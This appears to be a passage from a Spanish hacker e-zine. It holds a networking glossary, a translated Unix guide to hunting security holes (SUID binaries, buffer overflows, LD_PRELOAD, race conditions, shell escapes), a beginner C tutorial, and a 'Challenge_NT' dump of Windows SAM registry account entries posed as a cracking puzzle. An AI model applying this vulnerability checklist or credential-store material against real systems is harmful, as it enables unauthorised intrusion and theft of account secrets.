Capa de Sesion: Quinta capa, encargada de la seguridad y administracion

Capa de Transporte: Cuarta capa, verifica y corrigue errores, tambien controla
flujo

Capa Fisica: La primera capa, esta manipula los bits individuales de
informacion a traves del conductor que se este usando como trasporte de datos
en la red

[Nota: para todos aquellos que esten interesados en profundisar un poco mas en
lo que es el modelo ISO/OSI los remito al numero 3 de FYE donde ThEye
hace una muy buena explicacion de todos los procesos de dichas capas ]

CCITT: comite de consultas internacionales telefonicas y telegraficas

CD-ROM: Disco fisico optico, usado para guardar gran cantidad de informacion

Cliente: Persona que hace uso de un sistema en particular a traves de una
estacion de trabajo conectada en red

Cliente/Servidor: Base de datos cliente/servidor k frecuentemente se usa con
masquinas SQL o de correo electronico, este servicio consta de un servidor de
archivos que puede ser un mismo servidor o un programa como el caso de los
troyanos donde este proporciona los datos a la maquina o programa cliente

Columna: Segmento de cableado de red que interconecta a un grupo de segmentos
de red o sistemas. La columna dorsal (sientate bien!)con frecuencia se dedica
a al trafico de servidores o se mantiene entre los closets del clableado, de
manera que los sistemas operen mas rapido y a mayores distancias

Compuerta: gateway, dispositivo que traduce datos entre dos sistemas que
generalmente son incompatibles o k usan protocolos distintos

Concentrador: Red en topologia estrella que puede amplificar una señal y
transmitirla (concentrador activo) o symplemente dejarla pasar (concentrador
pasivo), este termino se usa para describir a estos aparatos en redes ARCnet,
pero se ha transformado en un termino generico para describir todos los
dispositivos usados en una configuracion de cableado home-run

Concentradores EtherNet: Centro de cableado que se usa para EtherNet 10BaseT
en un esquema de cableado home-run (atras centro)

Conductor-sensor de acceso multiple con deteccion de colision (CSMA/CD): El
protocolo EtherNet permite enviar y crear nuestro propios paquetes. CSMA/CD
se usa para evitar colisiones exesivas entre estas emisiones echas al azar.

Un dispositivo CSMA/CD lo primero que hace es escuchar a los otros
conductores, si no detecta a ningun otro, entonces procede a transmitir, lo
contrario si detecta alguna colision

Conmutador de Datos: Este aparato permite que los perifericos de una red
puedan ser compartidos entre todas las PC`S, una a la vez

Control de Flujo: Mecanismo empleado para asegurarse que los datos no sean
enviados a una velocidad mayor de la que el PC receptor pueda manipular

Correo Electronico: hahaha! ok herramienta electronica para el intercambio de
datos, archivos, programas etc...

Cuadro: frame, la menera como un pakete esta contruido para ser enviado a
traves de una red, se contruyen por blokes con notaciones de principio y fin
llamados; beades y footer

Datagramas: Mensaje que se envia de una computadora a otra sin garantia de
recepcion

Datos: informacion, en su forma mas integra creo yo k un pedazo de dato esta
echo de caracteres o codigos introducidos por algun ser pensante y que para
otro ser con la misma capacidad de razocinio es capas de entender comprender
y analizar, pero aqui entra la polemica del tarro, por que sin duda un
computador no piensa pero si es capaz de crear, alamacenar,manipular,analizar
incluso comprender mucha informacion entonces que es la informacion? cuantos
tipos de informacion ahy?

de facto: esto significa "de echo"; se refiere a procedimientos que se
convierten en estandares, dado que todo el mundo cree k es una buena idea

de jure: significa "de ley" o "de derecho" se refiere a procedimientos que se
convierten tambien en estandares, pero por que algun organismo asi lo decide

DEC: Digital Equipment Corporation, esta es la segunda productora de
computadores mas importante del mundo

Duplexing: consiste en que dos unidades de discos duros controladas de forma
separada mantienen la misma informacion para propositos de respaldo de datos
(backup)

En linea: se dice cuando uno esta conectado a cualkier tipo de red

Escribir un vez, leer muchas: worm, unidad parecida al cd-rom, se puede
escribir en el disco una ves y luego leerlo cuantas veces se nos plasca

Estacion de Trabajo: Otro nombre para designar a una computadora o
dispositivo que este conectado a una red, tambien se suele llamar asi a las
estaciones k corren algun unix o linux

Estrella: Topologia de red, en que los tarros se comunican a traves de un
solo dispositivo central

EtherNet: Protocolo de red que transfiere datos a 10 Mbit/s atraves de una
topologia de bus lineal


OK! y con este termino bastante conocido se acaba la primera entrega del
diccionario personal del ELECTRON, espero que le sepan sacar un buen
provecho, ya que tiene palabras bastantes desconocidas asi como otras que
estan muy trilladas, ahora bien no piensen que a futuro voy a poner
definiciones como hacker, spoffing, sniffing o terminologias de ese estilo,
ese tipo de diccionario abunda en otros e-zines y creo k explicar lo mismo
dos veces es una brutal peridida de tiempo.


Autor : EleKtr0
Titulo : "Electro-diccionario"
Entrega # : 1, A, B, C, D, E
E-mail : elektro@electron-team.com

,øñ°`´°ñø¸ 
-<[ 08 ]>-
`°ñø,¸,øñ°

Autor : Bash
Titulo : Agujeros de Seguridad, Como Detectarlos
Comentario: Bueno, a continuacion les presento una pequeña recopilacion de
material,es bastante interesante recorrer las distintas web de informatica que
existen... encontrando en ellas un material de una calidad aceptable y en
otros casos casi deplorable... Andube buscando muchas cosas las cuales bienen
en ingles y con un orden poco entendible, traduje algunas cosas y reordene
otras, eso si he conservado los DERECHOS DE AUTOR pertinentes...

Material de apoyo de BBK "Big Bro Killerz", Zeep14, Silicon Prefix.
http://www.geocities.com/Sil?conV?ll?y/P?n??/7?74

Contenido : Los Agujeros de seguridad pueden manifestarse de cuatro modos:

1) Agujeros de seguridad fisicos

- Cuando el problema potencial esta causado debido al hecho de dar a personas
sin autorizacion acceso fisico a la maquina,cuando esto les permitira realizar
cosas que no deberian ser capaces de hacer. Un buen ejemplo de esto podria ser
una sala publica con estaciones de trabajo donde seria facilisimo para un
usuario el reinicializar una maquina en modo mono-ususario y trastear con los
archivos de la estacion de trabajo, si no se tomasen precauciones.Otro ejemplo
de esto es la necesidad de restringir el acceso a cintas backup confidenciales
que de otro modo podrian ser leidas por cualquier usuario con acceso a las
cintas y con una unidad de cinta, independientemente de si tuvieran o no
permiso.


2) Agujeros de seguridad en el software

- Cuando el problema esta causado por una mala escritura de partes
"privilegiadas" de software (daemons, cronjobs) que pueden estar comprometidos
a realizar tareas que no deberian. El ejemplo mas famoso de esto es el bug del
sendmail que podia permitir a un cracker ((r)J(r) NO HACKER) el obtener una
shell con permisos de root. Esto podria ser usado para borrar archivos, crear
nuevas cuentas, copiar el fichero de passwords, cualquier cosa.(Contrariamente
a lo que la gente piensa,los ataques via sendmail no estaban solo restringidos
al infame "Gusano de Internet" (Internet Worm)

- cualquier cracker podia hacer esto Telneteando al puerto 25 de la victima.

La historia detras de un agujero similar (esta vez en el software "move-mail"
de EMACS) Nuevos agujeros como este aparecen todo el tiempo, y tus mejores
esperanzas son:

A). tratar de estructurar tu sistema de forma k el menor software posible con
privilegios root/daemon/bin corra en tu maquina, y que el que lo haga sepamos
que sea robusto.

B). suscribirse a una lista de mail para poder tener lo antes posible
informacion con detalles acerca de problemas y/o parches,y actuar en cuanto la
tengas. From: Wes Morgan morgan@edu.uky.ms

C) Cuando instales/actualices un sistema dado,trata de instalar/habilitar solo
aquellos paquetes de software por los que tengas una necesidad inmediata o
previsible.

Muchos paquetes incluyen daemons o utilidades que pueden revelar informacion a
extraños. Por ejemplo, el paquete de contabilidad del Unix System V de AT&T
incluye acctcom(1), que podria permitir (por omision) a cualquier ususario el
revisar los datos de las cuentas diarias de cualquier otro usuario. >> Muchos
paquetes TCP/IP instalan/cargan automaticamente programas tales como rwhod,
fingerd, y (ocasionalmente) tftpd, pudiendo todos presentar problemas de
seguridad.Una administracion del sistema cuidadosa es la solucion.

Muchos de estos programas son inicializados/iniciados en el arranque; desearas
cambiar tus scripts de arranque (normalmente en los directorios /etc, /etc/rc,
/etc/rcX.d) para prevenir su ejecucion. Desearas eliminar algunas utilidades
completamente. Para algunas utilidades, un simple chmod(1) puede prevenir el
acceso de usuarios no autorizados Resumiendo, NO CONFIES EN LOS SCRIPTS O
PROGRAMAS DE INSTALACION! Tales facilidades tienden a instalar/cargar todo
lo que hay en el paquete sin preguntartelo. Muchos manuales de instalacion
incluyen listas de " los programas incluidos en este paquete"; asegurate de
revisarlo.


3) Agujeros de sguridad de uso incompatible

- Cuando, a traves de la falta de experiencia, o no por fallo suyo, el admin
del sistema reune una combinacion de hardware y software y esta es usada como
un sistema, estara seriamente dañado desde el punto de vista de la seguridad.

Es la incompatibilidad de intentar hacer dos inconexos pero utiles actos lo k
crea agujeros de seguridad.Problemas como este son muy dificiles de encontrar
una vez que el sistema esta creado y funcionando, asi que es mejor el crear el
sistema con ellos en mente (fallos). Aunque nunca es tarde para volver a
pensarlo. Algunos ejemplos estan detallados abajo; no entremos en ellos aqui,
ya que estropearia la sorpresa.


4) Elegir una filosofia de seguridad adecuada y mantenerla

El cuarto tipo de problema de seguridad es el de la percepcion y el
entendimiento. Software perfecto, hardware protegido, y c omponentes
compatibles no funcionan a menos que hayas elegido una politica de seguridad
correcta y que hayas puesto en marcha las partes de tu sistema k la refuercen

Tener el mejor mecanismo de password del mundo es inutil si tus usuarios
creen que la ultima parte del nombre de su login es un buen password! La
seguridad esta relacionada con una politica(o conjunto de politicas/normas) y
el funcionamiento de tu sistema conforme a dicha politica.
From: Gene Spafford spaf@cs.purdue.edu


( Please contribute by sending E-Mail to scott@santafe.edu ... )
[Muchas de las ideas tomadas de: HaxNet - APG V1.3 : Guia para encontrar
nuevos agujeros]

[ Este es un E-milio que me llego de un amigo fuera de chile :- Þ espero que
cachen de que se trata, ya que yo de wena genta noma se los voy a mostrar! ]

NOTA: Creo que esto se debe de dividir en categorias generales:

1) Principios generales
2) Buscar agujeros en src
3) Buscar en las distribuciones binarias
4) Buscar en configuraciones especificas de sites.

Las siguientes clasificaciones generales sugieren por si mismas:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories
(Division sugerida de lo de arriba en sub-categorias)
I: Suid binaries and scripts
unexpected user interactions
flawed liberary calls
implicit assumptions of external conditions (sym links, loc. paths)
race conditions
II: daemons running with priviliged uid's
race conditions
poor file protectons
implicit file protections
trust
authentication
III: Kernel problems
Kernel race conditions
device driver code

El siguiente metodo de 4 pasos fue creado por System Development Corporation,
que da un indice de 65% de exito en las hipotesis generadas. El hacer una
busqueda detallada de imperfecciones en los sistemas operativos requiere 4
pasos:

Paso 1) Conocimiento de la estructura de control del sistema

Para encontrar agujeros de seguridad, e identificar debilidades de diseño es
necesario entender la estructura de control del sistema, y las capas. Uno
deberia ser capaz de listar:

A)objetos de seguridad: componentes que deben ser protegidos. Ej: un archivo de usuario
B)objetos de control: componentes que protegen objetos de seguridad. Ej: un i-node
C)objetos reciprocos: objetos de ambas clases. Ej: el archivo de password.

Con dicha lista, es posible el representar graficamente una jerarquia de
control e identificar puntos potenciales de ataque. Hacer diagramas de flujo
para dar un analisis visual de relaciones definitivamente ayuda. El leer los
varios manuales de usuario, operadores, y administradores proveera dicha
informacion.

Paso 2) Generar un inventario de desperfectos sospechosos

En particular queremos:
Historia de codigo:
De que UNIX deriva un defecto en particular? Esto es importante para proximas
referencias (muy a menudo solo un vendedor parchea partes del codigo, que sera
usado por otros en su "reencarnacion" sin parchear.Una referencia solida:Quien
chequea que bugs hay, en que sistema operativo y en que versiones,nos previene
de realizar una doble tarea.

Un buen comienzo seria el listar todos los binarios suid de las diferentes
versiones de los sistemas operativos. Despues intentar averiguar por que cada
programa es suid ej: rcp es suid root ya que debe usar un puerto privilegiado
para autentificar nombres de usuario.A menudo, codigo que nunca fue diseñado
para ser suid, se hace suid, para resolver problemas de acceso a ficheros.
Necesitamos crear una base de datos que sea capaz de "mirar" a pares y trios
de datos, especificamente:nombre del programa, suid, sgid, objeto accedido
(por que es suid/sgid), version del sistema operativo. Alguna sugerencia de
como implementar dicha base de datos?... esto seria muy interesante saberlo


Paso 3) Confirmar hipotesis (testear y explotar los defectos)

Paso 4) Hacer generalizaciones de las debilidades del sistema,para las que los
defectos representan un ejemplo especifico


Caja de herramientas que mando generosamente mi compadre!

AGREP: Recomiendo a todo el mundo pillar e instalar agrep de:
ftp cs.arizona.edu /agrep/agrep.tar.Z Agrep soporta "windowing" por lo k puede
busacr rutinas, y subrutinas. Tambien soporta operadores logicos y es de esta
forma ideal para automatizar la busqueda de muchos de estos defectos.

Ej: <psudocode> agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl or agrep
WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp() OR execvp()]}
/usr/local/src/*.c


PROGRAMA DE PERMUTACION: Otra herramienta que merece producir es un programa
que genere todas las permutaciones posibles de los argumentos de la linea de
comandos para asi descubrir caracteristicas indocumentadas, y tratar de
producir errores.

TCOV:

CRASH: Posteado a USENET (que archivo FTP?)(descripcion?) 

TEXTOS: Hay varios textos que tratan metodos sobre como encontrar defectos, y
presentan series de tests

1) Un estudio empirico de la seguridad de las utilidades UNIX, por Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12,pp32-44,Diciembre 90.
Describe una serie de tests para testear cadenas aleatorias de entradas. Los
resultados indicaban que un 25% de los programas se colgaban, se venian abajo,
o no actuaban como debian. En un caso el sistema operativo se vino abajo. El
entendimiento de la composicion del buffer y el registro en el ambiente en
cuestion, y la entrada esperada se entiende que dara los resultados esperados.

2) El conjunto de herramientas Mothra, in Proceedings of the 22nd Hawaii
International Conference on Systems and Software, pages 275-284, Kona, HI,
January '89

3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.Spafford,
Software Practice and Experience, 20(2):181-189, Feb '90

4) A paper by IBM was mentioned that was submitted to USENIX a few years ago.
(Anyone have a citation?).


Defectos especificos que chequear

1) Buscar rutinas que no hagan chequeos al limite, o verifiquen entradas.Ej:la
familia de rutinas gets(), donde es posible sobreescribir el limite del buffer
(sprintf()?, gets(), etc.)tambien: strcpy()

2) Las rutinas SUID/SGID escritas en uno de los shells, en vez de C o PERL

3) Las rutinas SUID/SGID escritas en PERL que no usan el programa "taintperl"

4) Las rutinas SUID/SGID que usan las llamadas system(),popen(), execlp(), o
execvp() para ejecutar otra cosa.

5) Cualquier programa que use nombres relativos de ruta (path) dentro del
programa

6) El uso de nombres relativos de ruta para especificar librerias vinculadas
dinamicamente.

7) Rutinas que no chequean codigos de error devueltos por llamadas del sistema
(Ej: fork(2), suid(2),setuid(), como en el famoso bug rcp)

8) Los agujeros se pueden encontrar a menudo en codigo que:
A) es portado a un nuevo entorno
B) recibe entradas inesperadas
C) interactua con otro software local
D) accede a archivos de sistema como passwd, L.sys, etc
E) lee entradas de directorios o archivos publicos escribibles
F) programas de diagnostico que tipicamente no estan a prueba de usuarios

9) Testear codigo para entradas inesperadas. Hay disponibles herramientas de
testeo de proteccion, flujo de datos, y muacion.

10) Buscar en los textos man, y guias de usuario las advertencias en contra de
las X, y tratar variaciones de X. Hacer lo mismo con la seccion de bugs.

11) Buscar comandos o funciones raramente usados o inusuales. En particular
seria util buscar argumentos indocumentados. Buscar flags de distribuciones
anteriores, o en versiones de otros sistemas operativos. Chequear las opciones
que otros programas podrian usar. Por ejemplo, Telnet usa la opcion -h para
conectarse...

12) Buscar condiciones raciales.

13) Fallos del software para verificar que realmente esta comunicandose con el
software o modulo de hardware al que quiere acceder.

14) Falta de deteccion de errores para resetear los mecanismos de proteccion
siguientes al error.

15) Implementacion pobre que da como resultado, por ejemplo, codigos de
condicion testeados inapropiadamente

16) Confianza inplicita: La rutina B asume que los parametros de la rutina A
son correctos por que la rutina A es un proceso de sistema

17) El sistema almacena sus datos o referencia parametros de usuario en el
espacio disponible de las direcciones de usuarios

18) Enterrar procesos de comunicacion: condiciones de retorno (passwd OK,
illegal parameter, segment error, etc) pueden proporcionar una brecha
significativa cuando son combiandos con el paso 17

19) Los parametros de usuario pueden no estar adecuadamente chequeados.

20) Direcciones que sobrepasan o se refieren a areas del sistema

21) Las comprobaciones de condicion de codigo pueden omitirse

22) Fallo al anticiparse a parametros inusuales o extraordinarios

23) Buscar niveles del sistema donde los modulos alli involucrados fueron
escritos por programadores diferentes, o grupo de programadores - se suelen
encontrar agujeros.

24) Registros que apuntan a la localizacion de valores de parametros en vez de
pasar el parametro el mismo.
25) Cualquier programa ejecutandose con privilegios de sistema (a muchos
programas se les da UID 0, para facilitar el acceso a ciertas tablas, etc)

26) Archivos temporales, buffers leibles por grupos o por todo el mundo

27) Carencia de valores de "umbral", y carencia de notificacion una vez se han
accionado estos.

28) Cambiar parametros de areas criticas del sistema antes de su ejecucion.

29) Comprobacion inadecuada de los limites al compilar,por ejemplo, un usuario
puede ser capaz de ejecutar codigo maquina disfrazado como datos en un area de
datos (si las areas de texto y datos estan compartidas)

30) Manipular incorrectamente interrupciones asincronas generadas por usuarios.
Usuarios interrumpiendo un proceso, realizando una operacion, o bien volviendo
para continuar el proceso o comenzar otro dejaran a menudo el sistema en un
estado de desproteccion. Archivos parcialmente escritos se dejan abiertos,
escritura incorrecta de mensajes de infracciones de proteccion, puesta
incorrecta de bits de proteccion, etc, suelen ocurrir.

31) Codigo que usa fopen(3) sin poner la umask. (ej: at(1), etc.). En general,
codigo que no resetea el UID real y efectivo antes de bifurcarse

32) Tracear es muy util para ayudarte a descubrir que llamadas de sistema usa
un programa

33) Escanea los sistemas de archivos /usr/local de cerca.Muchos administradores
instalaran software de la red. A menudo encontraras tcpdump, top, nfswatch,...
suid root por su facilidad de uso.

34) Comprobar que los programas suid fueron los que originalmente se pusieron
en el sistema. Algunas veces los administradores reemplazaran el password por
uno menos seguro que el de las distribuciones.

35) Buscar programas que se usaran para instalar software o modulos de kernel

36) Programas enlazados dinamicamente en general. Recuerda LD_PRELOAD,creo que
esa era la variable.

37) La programacion de canales de I/O (Entrada/Salida)es es un blanco primario
Busca errores logicos, inconsistencias, y omisiones.

38) Ver si es posible que un programa de canales I/O pueda automodificarse,
hacer un loop, y asi ejecutar el nuevo codigo modificado.

39) Si los canales I/O actuan como procesadores independientes tendran acceso
ilimitado a la memoria, y asi el codigo de sistema podria ser modificado en
memoria previamene a su ejecucion.

40) Buscar bugs que requieran errores en multiples partes del software,ej: di
por ejemplo que el programa "a" puede usarse para cambiar el fichero de
configuracion /etc/a , ahora el programa "b" asume que la informacion de a es
correcta y esto lleva a resultados inesperados (solo mira c uantos programas
confian en el fichero /etc/utmp)

41) Cualquier programa, especialmente los suid/sgid, que permites "escapadas"
a shell.

Autor : Bash
Titulo : Agujeros de Seguridad, Como Detectarlos
E-mail : bash@electron-team.com







,øñ°`´°ñø¸
-<[ 09 ]>-
`°ñø,¸,øñ°

Autor : z0rbas
Titulo : Curso de Programacion en C, Reforzamiento
Contenido :

Indice
======

-INTRODUCCION A LA PROGRAMACION Y AL LENGUAJE C
-DEFINICION Y TIPOS DE VARIABLES EN C
-ESTRUCTURAS DE CONTROL DE FLUJO, BUCLES


INTRUCCION A LA PROGRAMACION Y AL LENGUAJE C.

El concepto programacion se refiere a crear programas por supuesto, para esto
es necesario crear un codigo especifico, es ahi donde nacen los lenguajes de
programacion. Cada lenguaje es distinto,lo que se hace es escribir este codigo
en un editor de texto y luego un compilador lo traduce a lenguaje maquina, o
sea a un ejecutable. C es un lenguaje de programacion para el que no lo sepa,
este lenguaje es muy poderoso, los sistemas UNIX estan escritos en C. Cada
lenguaje tiene su sintaxis, en C lo basico que hay que saber es k un programa
siempre tiene lo siguiente:

<-----8<-----8<-----

void main()
{

}

----->8----->8----->

eso es un programa ya en si, solo que no hace nada, tiene justo lo basico para
que no te aparesca algun error al compilarlo. void se refiere al tipo de
funcion que es main(), main() esta presente en todos los programas escritos en
C, es aqui donde empieza nuestro programa. las llaves ( { y } ) indican el
principio y el final de la funcion. Quiza por ahora todo esto suene confuso
pero vas a ver que al final de los tres proximos capitulos ya no tendras
ningun problema. Otra cosa que hay que recalcar es el uso de librerias, para
hacer mas facil nuestro trabajo, por ejemplo si yo quiciera escribir en la
pantalla un mensaje, tendria que incluir la libreria stdio.h , esto se hace de
la siguiente manera

#include<stdio.h>

y ahora todas las funciones de esas librerias las puedes usar. Veamos el
ejemplo mas basico que se escribe con cada lenguaje cuando recien se comienza:

<-----8<-----8<-----

#include<stdio.h>

void main()
{
printf("Hola mundo\n");
}

----->8----->8----->

este programa solo escribira Hola mundo en la pantalla, \n es para que salte
linea, o sea, que haga como un enter. cada instruccion en C termina con un
' ; '. Para los que usan windows pueden bajar el turboC de la sgt url:
http://tcpp.homepage.com , es muy facil de usar, los que usan linux, deben
tenerlo instalado, solo escriban el programa y luego ejecuten:

#cc programa.c

el ejecutable quedara en el mismo directorio con el nombre de a.out.
para darle un nombre seria:

#cc -o nombre programa.c




DEFINICION Y TIPOS DE VARIABLES EN C

Primero es necesario saber que es una variable,una variable es un dato k puede
variar durante la ejecucio de un progra,a(fisicamente es un espacio de memoria
donde se almacena un dato). Hay distintos tipos de variables, numericas,
alfanumericas, etc. Cada tipo de variable tiene un nombre.


TIPO REPRESENTA RANGO

char caracter -127 a 127
unsigned char caracter o num positivo 0 a 255
int num entero -32768 a 32767
unsigned int num entero positivo 0 a 65535
long num largo(4 bytes) -2417483648 a 214783647
unsigned long num largo positivo 0 a 4294967295
float num real(decimal) 3.4 E-38 a 3.4 E38
double num real 1.7 E-308 a 1.7 E308
long double num real 3.4 E-4932 a 3.4 E4932


para declarar una variable en un programa se escribe el tipo de variable y
luego el nombre que le quieres dar a esa variable en particular, por ejmplo a
continuacion voi a declarar 3 variables.

int variableuno;
char caracter;
int variabledos;


ahora necesitamos poder operar estas varibles, las operaciones en C son:

Operadores aritmeticos:

+ suma
- resta
* multiplicacion
/ division
% modulo(resto de la division)
++ incremento
-- decremento


Operadores de relacion(lo usaremos en el proximo capitulo)

== igual a
!= distinto que
< menor que
<= menor o igual que
> mayor que
>= mayor o igual que


Operadores logicos(tambien los usaremos a partir del proximo capitulo)

! no logico(NOT)
&& Y logico(AND)
|| O logico(OR)


Operadores de asignacion

= asignacion simple
+= suma y asignacion
-= resta y asignacion
*= multiplicacion y asignacion
/= division y asignacion
%= modulo y asignacion


Operadores de direccion(estos no los tomes mucho en cuenta por ahora)

& direccion de variable
* operador de direccionamiento

Ahora la gracia es poder dar los resultados, por ejemplo hagamos un programa
que sume dos numeros:

<-----8<-----8<-----

#include<stdio.h>

void main()
{
int uno;
int dos;
int tres;
uno=5;
dos=7;
tres=uno+dos;
printf(" La suma de %d y %d es igual a %d \n",uno,dos,tres);
}

----->8----->8----->


Aqui si haz leido todo lo anterior, la unica cosa nueva seria el
printf(" La suma de %d y %d es igual a %d \n",uno,dos,tres);
analizemoslo:

printf(); es la funcion que viene en la libreria stdio.h
" La suma de %d y %d es igual a %d \n" es lo que queremos imprimir, pero que
significan esos %d, bueno esa es la forma de imprimir un variable, se pone %
luego la letra que identifica a la variable segun la siguiente tabla y las
varables se ponen separadas por comas a lado.

% Tipo de variable

c caracter
d, i numero entero
e, E notacion cientifica
f, g, G float o double
n puntero a entero
o octal
p puntero
s String(cadena de caracteres)
u unsigned
x, X hexadecimal


Y aprovechando el vuelo con la funcion printf(); aprovechemos de completarla,
con los distintos \

\ Accion

a pitido
b retroceso
f nueva pagina o pantalla
n nueva linea
r retorno de carro
t tabulador horizontal
v tabulador vertical
\ signo \
' signo '
" comillas"
OOO digitos octales
xHHHH digitos hexadecimales


ESTRUCTURAS DE CONTROL DE FLUJO, BUCLES

La gracia de un programa por supuesto no es simplemente k solo sume y no haga
nada mas, la gracia es que tenga opciones y varie su ejecucion, para eso
sirven los bucles.

<-----8<-----8<-----

DO...WHILE
la sintaxis de esta instruccion es la siguiente:
do
{
(instrucciones, cuantas quieras)
}while(condicion con la que finaliza el bucle);

----->8----->8----->

Lo que hace este bucle es ejecutarse cuantas veces sea necesario, mientras se
cumpla la condicion propuesta.

Un ejemplo seria:

<-----8<-----8<-----

int control;
control=0;
do
{
control++;
printf(" contando %d \n",control);
}while(control<20);

----->8----->8----->

OjO, esto no es un programa completo, solo un ejemplo,pero parte de lo k seria
el programa, creo que ya te habras dado cuenta.


WHILE
Esta es muy parecida a la anterior,la diferencia es que la condicion se evalua
antes de ejecutar las instrucciones del bucle, en contraste con la anterior,
donde se evaluavan al final, la anterior simpre se ejecuta minimo una vez,esta
por el contrario puede ser que de repente no se ejecute.

Sintaxis:

<-----8<-----8<-----

while(condicion propuesta)
{
(instrucciones varias)
}

----->8----->8----->

ejemplo:

<-----8<-----8<-----

int variable;
parte del programa que pide al usuario que introduzca el valor para la variable
(lo vermos mas adelante.)
while(variable<10)
{
printf(" variable = %d \n",variable);
variable++;
}
como ves si el usuario ingres una variable mayor o igual que diez, esto no se
ejecutara nunca.

----->8----->8----->


FOR
Este bucle se ejecuta un numero determinado de veces o simplemente se puede
escribir para que funcion parecido a los otros dos.

Sintaxis:

for(asignacion;condicion;operacion)
{
(instrucciones)
}


Ejemplo:

<-----8<-----8<-----

int x;
for(x=0;x<20;x++)
{
printf(" %d \n",x);
}

----->8----->8----->

Esto imprimira desde el 0 al 19. Simple o no?? Definamos los conceptos por si
acaso.

asignacion: aqui se asina la o las variables

condicion: aqui se establece la condicion de salida,pueden ser mas de una como
veremos mas adelante

operacion: aqui se incluyen instrucciones de modificacion a las variables de
control

Todo esto puede variar, porque como se imaginan,nosotros buscamos hacer cosas
raras jaja. Fijense como van los ; en estas estructuras,es importante ponerlos
correctamente.


Autor : z0rbas
Titulo : Curso de Programacion en C, Reforzamiento
E-mail : zorbas@electron-team.com







,øñ°`´°ñø¸
-<[ 10 ]>-
`°ñø,¸,øñ°


Autor : EleKtr0
Titulo : Challenge_NT "regedit32.exe"
Entrega # : II
Respuestas: elektro@electron-team.com
Comentario: Criticas bastante positivas he tenido sobre este nuevo metodo de
presentar un articulo, a la mayoria les parecio novedoso bueno y creativo, con
esto uno se puede dar cuenta de lo agobiados que estan todos de la tipica info
en bandeja,el desafio a muchos les gusta y son pocos los e-zine`s k se atreven
a desafiar a sus lectores ;)

Ahora veamos la parte ni tan positiva que se esta dando, por k como yo siempre
digo,hay que decir toda la verdad y esque no son muchas las personas que estan
tomado enserio este Challenge, osea sus respuestas dejan de ser complacientes
y en muchos casos dejan mucho que desear... esto debe ser por el cambio que se
esta dando y a traves del tiempo se daran cuenta de lo que realmente significa
un articulo como este, ya y ahora veamos la segunda parte del codigo, con esto
completo los dos desafios y quedan planteados para que quien se atreva a
decifrarlos y mande al correo una respuesta medianamente aceptable, se
transforme lo mas provable en el y quisas unico vencedor del Challenge_NT:


Contenido:

===================================== INICIO =================================

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names]
@=hex(0):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator]
@=hex(1f4):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest]
@=hex(1f5):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker]
@=hex(3f9):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_TESTMACHINE]
@=hex(3fb):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IWAM_TESTUSER]
@=hex(401):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\jsmith]
@=hex(3ff):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\vacuum]
@=hex(3e9):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\gjones]
@=hex(3f4):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ejohnson]
@=hex(3ec):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin]
"F"=hex:02,00,01,00,40,01,14,00,e0,ef,13,10,d9,02,bc,01,24,00,00,00,00,00,00,\
00,00,00,00,00,40,de,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,80,\
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,e8,\
03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,03,00,00,00,01,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"V"=hex:00,00,00,00,84,00,00,00,02,00,01,00,84,00,00,00,0c,00,00,00,00,00,00,\
00,90,00,00,00,00,00,00,00,00,00,00,00,90,00,00,00,00,00,00,00,00,00,00,00,\
01,00,14,80,64,00,00,00,74,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,\
00,00,00,02,c0,14,00,7a,04,05,01,01,01,00,00,00,00,00,01,00,00,00,00,02,00,\
34,00,02,00,00,00,00,00,14,00,85,03,02,00,01,01,00,00,00,00,00,01,00,00,00,\
00,00,00,18,00,c5,07,02,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,\
01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,\
00,00,00,20,02,00,00,01,01,00,00,00,00,00,05,20,00,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases]
@=hex(6):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000220]
"C"=hex:20,02,00,00,00,00,00,00,84,00,00,00,02,00,01,00,84,00,00,00,1c,00,00,\
00,00,00,00,00,a0,00,00,00,60,00,00,00,00,00,00,00,00,01,00,00,38,00,00,00,\
02,00,00,00,01,00,14,80,64,00,00,00,74,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,34,00,02,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,\
01,00,00,00,00,00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
